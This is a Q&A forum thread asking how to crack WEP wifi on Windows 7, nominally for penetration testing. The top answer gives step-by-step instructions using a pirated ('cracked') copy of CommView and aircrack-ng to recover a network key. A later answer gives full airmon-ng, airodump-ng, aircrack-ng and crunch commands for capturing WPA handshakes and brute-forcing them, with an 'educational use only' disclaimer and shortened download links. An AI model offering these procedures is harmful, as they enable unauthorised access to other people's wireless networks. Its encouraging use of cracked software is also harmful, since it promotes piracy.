How to hack WEP wifi on windows 7

0
=
0
+
0
No specific Bitcoin Bounty has been announced by author. Still, anyone could send Bitcoin Tips to those who provide a good answer.
1

For penetration testing, and proving to business that it's a weak encryption to use WEP, what is the easiest way to hack it on windows 7?

Tags: ,

3 answers

3
=
1
=
$2
1 tip with total amount of 8.9 mBTC($2 USD) have been sent by alex

You will need:

  1. Commview for WiFi (cracked if you don't want to pay)
  2. Drivers from XP
  3. aircrack (open source)

(download)

Data Gathering

  1. Install commview: go to the commview folder in the package and double click setup, follow the install nothing special but once done it will fail saying it's not compatible with vista, ignore that.

  2. take the crack file and place it in C:\program files\commviewwifi\ (or program files86 if you have 64 bit windows), it will say something about overwriting accept it.

  3. Next right click the file cv.exe and click properties, capabilities and select windows xp sp3 and run as administrator.

  4. run it, now if you can click the play button your drivers work your lucky and can skip to number 7

  5. otherwise you can close the program and right click computer, manage. go to Device Manager and find your wireless card that you are using (under network adapters) now right click and Update driver software...

  6. Browse, Let me pick, Have Disk, Browse Locate the pack included and go to Driver or NewDrivers (one should work for new as there's different versions [thanks logan perkins]), ok it and see if it finds your drivers If successful open the CV.exe again and you should see the play button highlighted it worked and you can continue

  7. click it and select Scan find the network you are targeting and begin the capture Note make sure to check the logs to autosave and increase the size to 1000Mb and 100mb per log They will be located under the program files directory of commview, LOGS

Cracking

It can take 4-8 hours of gathering packets (might be less or more depending on how lucky/unlucky you are - took me around 20 hours because of weaker signal strength), once done you can continue to crack the data to gain the passphrase shared wep key:

  1. Open the logs with commview, file, export, Tcpdump files (*.cap) save whatever name you like

  2. Use aircrack, Aircrack-ng GUI.exe, browse to the files, choose 64 (or leave at 128 if determined it) and launch

  3. wait for the loading and press 1 and enter, the cracking begins and when done you should get the key.

Note: remove the colons and use just the numbers.

SEND BITCOIN TIPS
User rating:

Thanks Boris, sending you Bitcoins :)

User rating:
Thanks!
1

Download a app on the computer

SEND BITCOIN TIPS
User rating:

thanks for shearing

0

Hacking Wifi with aircrack-ng Kali linux 2.0 | 2016.1| 2016.2 Aireplay stop FIXED Hi there! Fstein here :)

THIS IS FOR EDUCATIONAL USE ONLY ;)

How to hack wifi with aircrack-ng wordlist and crunch

Aircrack-ng with wordlist

  1. Switch your wifi adapter to monitor mode using this command

    airmon-ng start wlan0

    if this failed enter this

    airmon-ng check kill

    then

    airmon-ng start wlan0

    make sure that your wifi adapter supports monitor mode

    you can also buy a wifi adapter on Amazon, Lazada or any Online store. Before you buy make sure that its support monitor mode or else you waste money :3

  2. Check if you switch monitor mode successfully

  3. start airodump-ng

    airodump-ng xxxx (your wifi adapter)

ex.

airodump-ng wlan0mon airodump-ng wlan0 airodump-ng mon0

then find your target

  1. Start capturing Handshake

    airodump-ng -c (channel) -w (path/path/filename.cap) --bssid (BSSID) wlan0mon (or mon0 or wlan0)

  2. Cracking with Aircrack with wordlist

    in Kali linux there is already wordlist name rockyou in /usr/share/wordlists/ you have to extract it before using it :) in my case i move my wordlist to /home/fstein/rockyou.txt

    aircrack-ng -w (path/path/wordlist.txt) (path/path/filename.cap)


Aircrack-ng with Crunch

  1. Switch your wifi adapter to monitor mode using this command

    airmon-ng start wlan0

    if this failed enter this

    airmon-ng check kill

    then

    airmon-ng start wlan0

    make sure that your wifi adapter supports monitor mode

    you can also buy a wifi adapter on Amazon, Lazada or any Online store. Before you buy make sure that its support monitor mode or else you waste money :3

  2. Check if you switch monitor mode successfully

  3. start airodump-ng

    airodump-ng xxxx (your wifi adapter)

ex.

airodump-ng wlan0mon airodump-ng wlan0 airodump-ng mon0

then find your target

  1. Start capturing Handshake

    airodump-ng -c (channel) -w (path/path/filename.cap) --bssid (BSSID) wlan0mon (or mon0 or wlan0)

  2. crunch min max abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng path/path/handshake.cap -w - -e ESSID

SUCCESSFULL RATE = 100%

Thankyou for watching :) Please subscribe :) Like and share!!! :D

my aircrack-ng guidelines text file download here - https://goo.gl/htQKd9 it is the guide on the right screen subscribe like and share :) THANKS For watching! If you like to hack wifi with easy steps with fluxion tools see this - https://goo.gl/cM7uKe

SEND BITCOIN TIPS
0

Too many commands? Learning new syntax?

FavScripts.com is a free tool to save your favorite scripts and commands, then quickly find and copy-paste your commands with just few clicks.

Boost your productivity with FavScripts.com!

Post Answer